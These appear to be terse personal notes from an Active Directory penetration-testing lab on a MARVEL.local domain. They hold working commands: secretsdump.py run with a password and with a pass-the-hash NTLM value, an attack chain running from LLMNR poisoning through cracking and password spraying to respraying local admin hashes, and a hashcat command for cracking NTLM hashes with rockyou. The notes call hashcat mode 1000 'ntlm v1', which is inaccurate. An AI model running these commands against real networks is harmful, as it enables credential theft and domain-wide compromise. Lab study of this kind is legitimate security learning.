secretsdump.py MARVEL.local/fcastle:[email protected]

Using hahses to dump

secretsdump.py <administrator:@10.10.10.162> -hashes aad3b435b51404eeaad3b435b51404ee:fbdcd5041c96ddbd82224270b57f11fc

LLMNR→ captured fcastle hash →cracked → sprayed the password → found new login → secretsdump those logins → local admin hashes → respray the network with local accounts

cracking the hash

1000 is ntlm v1 as we used last portion of the hash

└─$ hashcat -m 1000 ntlm.txt /usr/share/wordlists/rockyou.txt